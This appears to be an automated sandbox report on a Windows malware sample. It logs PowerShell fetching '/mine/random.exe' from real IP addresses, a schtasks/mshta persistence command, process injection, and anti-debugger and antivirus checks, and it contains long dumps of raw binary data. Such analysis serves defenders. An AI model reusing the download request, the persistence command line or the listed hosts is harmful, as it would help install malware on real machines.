)]IþRýGÌ%âÉÞá@PÓ£U¦r#$Ä«÷»kThZ©ùÏ¥×FÖÇ¨¿ë*,ûÏµçâi¤Æ²«-Æ@å%÷ ~Ù§Eë : ×)_÷½ý/6Fù?¬v¦HöÉÚÄPMXNÝZaº{è± þ/g T)«¼:× ÆÉ2òuAÑkã+H®OÂZÃÿqK\5£Çñ$YÛK »IÚ)Ï§! %ßùb·ÕlÉHùñÒ1«!ÙÂ/ú,4ÆFÃ¹¦Ã,¹Soã¨-ÉÕ³ 4ûêÂÅ 1Ùgd%F@_)ègzJã¿µ'é}EÂ b;²ÃuÞG%lZî¸¢ `·ßOîd\îîñ×4ôà¾ 8.Ç¸³ü»µÅ5¥ðQKÊÝ4xÕNÿ«ñ¿!+Ì>1\|°eÊ¯÷-Þ^$kÞz¾\[?ötZ>ÇKty¿k:ãê%`õQlx /ßvZàuÿ÷Àbr/ÃqÆ$M!&Z-CqìrÓñ83É~_Æn¿Ø·_sÇoãàBØÒ÷EYÐ×fºv[þèÁÇÊ¹eº5ù`Òî¢HÉÂ2TBi:ÔÂàEJÐZ)déªDTzÐ%»S·d¿YÇê¥nç'3\Ëß³JtêYwûeªj¥!ÇËSêÙQ>º3§ ô®éU÷(Dã¯Çþ1 (cÜ2·Ê.ë'Oôð(¸QÏ'æ ï ÒtiyP?%ÖØ×¿\|´6À9;¹òàQK`§b(º +1(='«yÑÍdòá¾åÁzgðÅêíFºeÇþ([a(I»CÝþ.íñüÅËöUîÓ^½ }Å©¿«tSìrf®m_{H;êø5<«¤[1¹uÍl/sx !óBùMý¤¥]°8=²å¥þÔ¥ÄÙ$uè¸Æ ëád'Ã[èP ñÞÔÉÑ 0)É!Æ·ìÎhÖ8-YcI^shó,ëZÑa¬ñÃ¾1ËäÇ·Î\0é_ñÃ9 ´óæ3ùáºÂ%5îâ Å÷ìõ±çrÈ%Ô«É]xZ-»)ZnÈ,+ 7Ï»_eµ%wø1Êïk²fË¸]å(-Ùf!3 $åÈ®³EK¿-#uO )Íqäà1\|)¤»#Ö-P4[ÿ®-j¸±ÔëX£OË&ZeêÃÇòÚE¯üÎÏº«aBÊr©1× ò)îµï/æ-¨Å /þDîy2hA¯P·T Zq1®µj£WØLÐ%ÂÏwaufØWýq-t¬ÏIGúøR×Zxî1Èç ]<£'ÇÞôÈ²»®÷lYÏ+AÊ¿uzáW2uÉ>Ô"Äþâ2³ëòÃ#T4ª8q#ÉâgùÐeÉAæ÷y0Ot_X®3cÀY¸ÔûãÊ9%÷LâJÆèLÖ®xe%ïD@ìÞÕÂ~ÜMd("ñTõÆë!&½Ný> )º^{[êöö¬Äñ$ÙäñázóÄ)Ã¯ö?-$eK¯(1ò¾"iõêîó/§ì_¿f1^Ç5âRß>ùhÒ_Êk,èÃafÿ0M¦ª)ý°)úï¨Íµ¨Ëò]£%ï'øö\|äâßì+Ý)@²4jñ:^T)¯\.ª)60¾rÉ°7)ÖûÊæ ÁE¥+ñÚâÉ¿õÅ--UKóé°@±ÇbÇôP)Ð°I1ÜãxÒ0ÇË?ÑÆ§®Wâ#[üµ£ÇË[Ô%Ö:ÄöìýÖ"ÂºWå_§Ñì¥ösdÃÄëü²¤Ó¿`1ÜòO%½@ïJ7êod}ªSÔ¼¬K²jìLÑ±1Þ+ðøÎÒH³P_þ¯)ÄkÅtèæ%eú-U³·ã¸d¿S°»[bí·ðÁèé³ ;Tb3ýÙ%P ¬ íì?9q-ïY!ö:¶åRpÛ½sh)+§vá%%ãå1,ÄÈ«jèîaNÇsÏG ±,Æ%(¤12Î+&ëTär\MÏ¿Krñ(-pvZî¢ ð%UOÏ®Ý$ì&'Ã~ÿÑ}]G¥½×{Ç/ Ä{¿cßõèí¥ïh % ,1û/!ÏbÇwÅð-VÑõ(¬./ñôÖ½±ë øÙ[ÿ-;ª4á0 0+xz½ç¿ë
Data received	L9`ÞÙaø.,{%½!!3#óÿÄ³üúÈRÜ×Ð ÷«µ·HÛIÀdñª7%¢aq³£÷ÕM^×Xl½jÈèKûveÙ[Èá6÷Q74ñ¢òW_ªõó\|¿M àÿ,[¡yFë$(9Ôþ<¬ÁR&ZzfÒ®åÑgs@dÆWjMÇá>û¯ñ[ÊÀ±ÎhñÎ »ÿPãë¹ÿH%O²×_ÆòO½ícJ¶}o1ÑÈá¼AKâ3HÛ®'Své2êöéX\}q %& óAëÍ@=X¸p³T4¸jÇSn!÷~^$NÖ¿)~þWôfÏ)M¿ÎÁ¦Â%o éö0¾Ôú»VðØÄBÆÁ üÃª}sxf¿¢Ü?ò¦·ðjÿÅÏÛ!C\ ÀA 0ìt<>7çÑ¤ëÄXòz#±,è.$« 5ãý¶ Í_y+yÌ÷=û¬&P_ O:í(ôF&l§ªÖVJJÙú'øo¯e+®7Ã¤;Hõ¦>Yá)\èk¹`1QKäñ<«ia ð×Tí%)~¬ ï!éKøÀ,³L¿y ÷2¨à½×9&X(eG¥þÄÛ¢p,ù>kØç a´ØÑCâ0cç÷3ø¼J Ý}M®i[` ÄüÚé%a×õÎÂ'¹À©ÿU«áÞªNòí¦¸møËE8Séß9\Hh0~iXÞWJ1QI 1ÒSsîå¿øùW¸y;ûøM=þJ¹É¨QU¢,Kb> UÚïº+^ÿÔX7ÁqþÐOSñé[â7µ0ìãÞ¨&¢ St©nqK^â¥]7 C5¶/U²¤WñÙ%Fð3½ëßD®, SÀÃÏ(1KJPÊ§[çE Ô`Þp£%Àñ"DÚuø(ÖãKÞÈ¡TçAJä`Vyß`5ñA>³þ³ ±ö8y'êA¸^8ÄRJ~ô_Ñý¡1A{Kå(föò%[_ÂUÄgJ©"È )ûÍÙ ý+ _rC JýJ¨·ØíêõT?i²öO9/òÌl'ÏfÓÒXÖ¿O«`oZèDmð"i[q=P_©rOùB¨ox«K¯P[ÌzQ\YZ¼9§üñ©<eû?À·KÙxÙ+[j°Ðl,@gm$M;%QÝIqA`bÓ·&¢ZR»røÐN´£@{£BÞ¼úÀ`Ä&Ææ=ôÊ¨ëUDÌT`>?æ<¨CRä+Çf&±Á.æo7d«ræ +ü ÒÉ9 nÔà¶àñh TÖ½þþåûéVa`ª%;Nf»%MÆÄ¬< éãù² Z'Viëå(6%â\|ÖÚØªûØ\U`/qiôÔ7¡ÔÄÍæ£ç×"Çóç¼¸ÏÂùÉäö\|TLûÑÅØ_Ø# NµRb±Jz»(30D@O¼[¡oPQ[V£¬ ^YU7 ´÷0)%![Køh8±o$ÎXÝ1/tZÅä3²'omÀô(Ó§xê¸\['TBöâ¸g¹{ko3ÔÄ³,_´Ù¤ºW ,ô15ÊRE³{!uUÝí&a©]zLüC¤,ø¤2ËAúQp»ð#L'ô!¿,äaÜA¾TÔ}ú[wØÏ2 é -a=:`û]ÎV<Qq§~Ô4ÞÏ É(ßøb~G¬×PÑÂØ· séáÑM¥~ôöÞª»¤6+¿ ²ür"@u(´¥gkt¿5£aCtßdl%á@:#â-{ÑsA¢É,kÑ{u°»ã[ÛÐ,9Z\§þgià([a/¢¾·Ô<%¹ä¬¼bÔÛã#K½½ÒZ¶Ì²0f_ËÕ¸tyõ.uke¾íQ VÄNä [ù ¥COÃµ&¿Í!À n¢Ó×ÀÔzÌ/+ÐßP6_ÖT\P:»2ìàñq{L°ÇJ$¹V½<óðÉÀTëâ«c¦,×¬µo7ápävL_Eç«Nj¬%ÂU8!òöB-,ÑR QÁ¹÷3£¸ÙÂöéÜ PÿMZ ½'üKIXÃ·Ýôdû0!Ç ´á×ÐVzìçb²±Æ¢ù[ºVí)-¥sÖ¥ÝëâWP\|'QüÓóÄdõV7"ßAá¹YPµQAñ)R û%D¯Ú1uaåà¹±0ÙAâ`hªáÅa%%ãVkêÁ`S_aýamÐß=«u8ÝD;ûåóÿ^e)¿ã¬Íåîgêo)ù=öµWÙóP´Á«RV<ø5§bl·î-+ÒiÚ(w B±ÑÆ3^·D¯ÏÇ@´&Q+?[± +"ær R1'Þâ¥YlT%°@Ìîì¦J:¸nâ;õ½òÒÂlÓúì{øÏ3¸AO.ô¿óp Í¦â¡Þ^qbGpÁø/áÀ¤§¿}ú[é³'òÿûxgOÊ¤Ô®ÕF%È}Èµz(NH©ð¼ Ï·L@ñjsØHfÈ[Gð`u¤ÿ¹¾)%as¥µ=²àrða<Eqî)Ýa.ã#!'×0üúärL¶ÍÅfX8Q7¦jÊì{påø` Î£ãju7S»¾ñÇÉÁFMNFÈK8,E´w6.ù[íH`ß]?à¿fÅÁrîtÜISvIíVÝa.nX]!¥áK@¯0 ;í+Û`ilzô)¿34~^"a#½[ó2Éctmö'¡Gdø;º QÁB yj\ö<)Ò¯3X"êûlZ]A1ÆÎû2È÷ Ô2½Ê.\çÎÆóyL_Øûµæv<à×ôäVÌð´Sºè`[Û¨Áª ïaË «ÉÇV»)V`ÙµÅê&Ö8eüÊÛ¢xz¦¢³¹ï9³ f»×½ê%ÀLE^WóÂKÍ?zhMh ¡Á½´ÂAÐñuª`uª¨ÚùÕþê Ævq¥·öâHT`~EyòóÂßéäà[½õVìÝ8ÈbÔa°Á`.7xú¤îzòÞ!Pq»Ð¶þ¡Ò8¾µ"Î!ÕðoMß>XaæpÖêE×äq®!´QýÀóg¾¡òà¼%ÜÙd_éE"êS»K¯]×¨nèJ³% ¾{R'Ö)ï[ì@¾ÿ'0ÚB]ýßhØ)ÿõÊpà iÖwé³_WÝy9NÚW¯¹¾mIzVòå!Fúé]§ûSè »JDï0·×JL= Ñ4ÑæîÅæäa(¥%4^é¥_ã0Axæ¼®9ü¿"pYéch»[èïÆ²@EÁ/$C¿o»×1û HÓÀù¹U·ûÍ½.°¼3Nö)àAç<÷sZ^sdKBüVÜkïTþÂÊÀûp2Ê#?ÆÚ"Ä +1ÒÌ"1ýÄ%Är5IÖpÆ½à¬s_Ñ[ê4Þá+?a·¾ãÜÞâ¢aëá{ l@l+ÆQä87ÙLð{è'ã<ï~^Ò [t[éÍò@Wí(¯0ÛD¾.Y=S%µê°ÅL2èÒ×ÊaN&ÑÂ¿·XGRÐóQ_ÿp¹¸ï%à²8ÒàÌ&Bh0%,&+ú½z×°BÚq}7B?@ÏIô'aE¯ï©@z]e9×ÔiÒj+ åöÉ-q4h4f¿æ©t¦Q¡§#PéK`úna7®&Z·õ³®%(z^è¿¦"-+(ÛoLìQ¡%b[=üI[~0¼iµ¿jM9¦ú¥®Sõ©ªñ»]ÃTºü¢6·ZW FK'Sh v`ÎAñ8×ÀYl¸äõ±ûôèÈ÷ ·à_«@yi¿ .vY¥Ø)Ã[Q!3½FQ¦óTÆéòUâo9MwG#àq¸éZEí7¹`ÜãY{«Þ}Ø¢'ô %Íèd`OKÜÍéÂ/té_Û.À;ªÊÎÄG.ô¿§ª@1Ä\¾ÇCHRWEà¥ýS30T¢;VèKsp 1Á7a-dìÃhgÍÖ¨â¾QFTS4¤òfµ¬÷6HW¦Ìà!Ór@àaJ-½Ï+U¤ÙìÀg,þ×iB²4É°CÀÑ&¢TíXP?Ý>qÑÀÇ\|= s@ëaÕæ)#ÇÛ\|Iè9AøZÒºN_f ú-£a·Û¿¤ºÉyÎëM@?¿&SJâîQ)ü\[é%¹ãÁQ³¶²â^dwIóAPðà-;1ÍÂ@^SQÕÒT&ÀÄKÜ¦à¸Î±¼:$Y!³ÐÒ¥@¿åë3ò,KÁ]/51«d¬N_÷Ã Æ
Data received

Poweshell is sending data to a remote host (1 event)

Data sent

GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Feb. 11, 2025, 10:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 11, 2025, 10:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 11, 2025, 10:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://purl.org/rss/1.0/
url	http://www.passport.com

Yara rule detected in process memory (50 out of 51 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Hijack network configuration	rule	Hijack_Network
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	tasklist

Communicates with host for which no DNS query was performed (4 events)

host	185.215.113.16
host	185.215.113.43
host	185.215.113.75
host	62.210.113.223

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Feb. 11, 2025, 10:40 a.m.	process_identifier: 2760 region_size: 380928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000204	1	0	0
NtAllocateVirtualMemory Feb. 11, 2025, 10:40 a.m.	process_identifier: 2696 region_size: 376832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000204	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 212 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 11, 2025, 10:40 a.m.	class_name: OLLYDBG window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (3 events)

file	C:\Windows\Tasks\skotes.job
cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELð¤gàbª`º@Ð@Y°9´.textÊ`b `.rdataó "f@@.data\|Ñ°N@À.reloc°9:Ö@B base_address: 0x00400000 process_identifier: 2760 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2760 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%gàfª@¹@À@Ù9´.textdf `.rdatas "j@@.dataôÏ°N@À.reloc9:Ú@B base_address: 0x00400000 process_identifier: 2696 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2696 process_handle: 0x00000204	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELð¤gàbª`º@Ð@Y°9´.textÊ`b `.rdataó "f@@.data\|Ñ°N@À.reloc°9:Ö@B base_address: 0x00400000 process_identifier: 2760 process_handle: 0x00000204	1	1	0
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%gàfª@¹@À@Ù9´.textdf `.rdatas "j@@.dataôÏ°N@À.reloc9:Ú@B base_address: 0x00400000 process_identifier: 2696 process_handle: 0x00000204	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Feb. 11, 2025, 10:39 a.m.	buffer: GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Connection: Keep-Alive socket: 1416 sent: 79	1	79	0

An executable file was downloaded by the processes powershell.exe, skotes.exe (9 events)

Time & API	Arguments	Status	Return
recv Feb. 11, 2025, 10:39 a.m.	buffer: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Feb 2025 01:44:09 GMT Content-Type: application/octet-stream Content-Length: 2121728 Last-Modified: Tue, 11 Feb 2025 01:06:14 GMT Connection: keep-alive ETag: "67aaa286-206000" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $§»-IãÚCãÚCãÚC¸²@íÚC¸²FBÚC6·GñÚC6·@õÚC6·FÚC¸²G÷ÚC¸²BðÚCãÚB5ÚCx´JâÚCx´¼âÚCx´AâÚCRichãÚCPELVðfàê J@ÐJ @W kX´}Jd}J @à.rsrcX@À.idata @À 0*°@àwdedeidu°à0¢@àbobdrwdlJ: @à.taggant0 J"> @à received: 2720 socket: 1416	1	2720
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELvtßà.0@n^ `@ à` ^K`Ô] H.textt> @ `.rsrc`F@@.relocL@B.rdata N@À.rdataÀ^@ÀP^HtV¨Û2W$0j~:_~®(ý é s ~¯(þþ ~°(~±( ?rps z(2~²( .~³(Z~´(~³(nrêp~²( ~µ(&.~¶(~·(!~²( ~¸(%2(\|( 0t ~~i~~i(~~i@(~~i~~i(~ ~(2(\|( (\| %Ð~¹()0j~º(-~»(1 s ~¼(5~ 8+ rp~½(9~¾(= X i?Ìÿÿÿ0 AA? È« Û}Z \4A YÒJ [x,Z §^ vÇào %¦ s' î<Òb Gø YÓ' ³ µªE ²¡ :eN Û %`æ ÔY¯] \Ë¾d \Ç¢v û®Q üæ< ]2³ å¤' o½ ·GZ ¦ u²T +(ó æ ò] W÷ ë; wÃ »!j+ x¾! 6í8" ¼. &# Äî$ gÓ=% ð;:N& \|¦¯K' \j( pô¹:) _áY&&&("> nj[mn!j>&\jn[mn!j=jn[&nj? nj[&8'\#Z: + ,nj= Z Y! > n j[i-8"+--~¿(A,--]-X-- ?Òÿÿÿn(j> %a [&-.84.+-X,-X ].+.0+.+-+-0-X-- ?Àÿÿÿ-.rp/~º(-/~À(E~Á(I/18<-X~º(-/~À(E~Á(I~Â(M]-.+-X~º(-/~À(E~Á(I~Â(M].s 22+.o +.+-+-2o +-+.X~º(-/~À(E~Á(I~Â(M]3s 44+3o s 551o s r,p5o 77~Ã(Q~¾(=o61664o aÒ6161X11?¼þÿÿ0À~Ä(U s i~Ã(Qo9%:&r>po~Å(Y ~Æ(] MZ;ÝR <~Ç(a ~È(e PE;Ý' X~Æ(] X~Æ(]XX 8¿ (ZX ~É(i ~Ê(m"~Ë(q(~º(-r@p~À(E~Á(I~Ì(u9P X~È(e X~È(e n~jn~Í(y8 X ?8ÿÿÿ:ÝÝ&Ýso oAFc©2(\|( 0G(\|$%Ð~¹() K%Ð~¹()0~ X~Î(} ~Ï(8M ~ ~Ð( X~Ñ(t& ~Ò(t~Ó(Xi?ªÿÿÿ2(\|( º(\|Ð ~Ô(~Õ(~Ö( *0W Ð( o @%Ð¨( request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZÿÿ@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELà$I¼Ðað@ ÷Ú@Ü` j àú .texte"I$I `.rdatap¨K@IªK(I@@.dataðÒ@À.idataÜp@À.relocj ¢t@B.symtabP B.rsrc` @@$ÃÌÌÌÌÌÌÌÌÌÌÌÌ$ÃÌÌÌÌÌÌÌÌÌÌÌÌ$ÃÌÌÌÌÌÌÌÌÌÌÌÌ$ÃÌÌÌÌÌÌÌÌÌÌÌÌ,$ÃÌÌÌÌÌÌÌÌÌÌÌÌ4$ÃÌÌÌÌÌÌÌÌÌÌÌÌ<$ÃÌÌÌÌÌÌÌÌÌÌÌÌÿ Go build ID: "JASZKQB4LbrX-hbg6Cm-/rRU0F0grYnhQu81WjEsK/MWYtPQQF8pik79JoYcAD/sIWjWj2ihmIquGx2ZDRm" ÿÌÌÌÌÌÌÌÌÌd ;av ìè&D$$D$D$èÄÃèÉ0ëÇÌÌÌÌÌÌÌd ;aØìD\$Hl$LëÍóí1ÀéÇ¸ÿÿÿÿÀ}1É1öèë'9èp9õz)Å}ÿùß÷ÛßÁÿ!þÞø\|°;cpu.u¨1ÒéºÿÿÿÿL$,t$@ÒI9Â#újül$Ý÷ÛÝÁýå4+z9øäl$(t$4)Ðhÿl$Ý÷ÛÝÁý!ï,;l$0øu f}onuføëøu\f}ofuT\|;?fuKøÝÃÝúu!f>alu\|$(\;;lu ÔÙ1ÀéD$ÔÙT$(\$1Àéâèì\|\$ÇD$èÖD$0$D$D$èÂËv$ÇD$ è¬D$4$D$D$è©Û$ÇD$èèí\|L$,t$@éCþÿÿD$\$8èc\|$ÇD$!èMD$8$D$D$è9©Û$ÇD$è#è\|L$,t$@éäýÿÿÐÙ ÔÙL$,1ÒëÀB9ÊX¶h ¶p8\|$@xÀtÚÀtp¶3Àug\|$(T$$D$<è·{Ï$ÇD$è¡D$@$D$(D$èý$ÇD$èwèâ{D$<L$,T$$édÿÿÿé[ÿÿÿÄDÃ@9è1ýÿÿÛ4>,uéé#ýÿÿB9Âaýÿÿ¤,}=uèéRýÿÿE¶l$t$49Ð¤=ÐÙ-ÔÙ9èñÅÁàt<9ÞuÈl$$D$ <$D$4D$t$è×¶D$ÀuL$,T$(\$l$$ë ÔÙÐÙD$$9Èl$ ÆD+ ÔÙÐÙ9Èso¶\|$D+ 